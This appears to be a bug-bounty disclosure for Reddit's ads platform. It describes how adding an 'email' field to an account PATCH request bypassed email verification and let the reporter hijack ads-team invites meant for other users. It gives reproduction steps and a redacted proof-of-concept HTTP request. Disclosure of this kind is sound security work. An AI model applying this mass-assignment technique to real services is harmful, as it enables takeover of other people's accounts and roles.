Able to bypass email verification and change email to any other user email

The reporter discovered they were able to hijack invites to other ads teams by adding the extra field, email, to a request that would allow them to bypass email verification. By doing so they were able to accept invites to ads teams on behalf of others and assume the role of the invitee with their own account. A snippet of the PoC is included in this summary below. ___ Steps to reproduce 1. Create an account with any email you wish from https://ads.reddit.com 2. Don't verify your email 3. Go to https://ads.reddit.com/account/account_id/inventory-type and set any value to capture the request . 4. Change your email to any arbitrary email. 5. Your email will be "verified" and you will be able to accept invites sent to the target email if that email had an invite to an ads team. ``` PATCH /api/v2.0/accounts/<account_id> HTTP/2 Host: ads-api.reddit.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://ads.reddit.com/ Authorization Bearer: ████████ Content-Type: application/json Origin: https://ads.reddit.com Content-Length: 101 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Cache-Control: max-age=0 Te: trailers {"data":{"brand_safety_tier_preference":"EXPANDED", "email":"█████" }} ```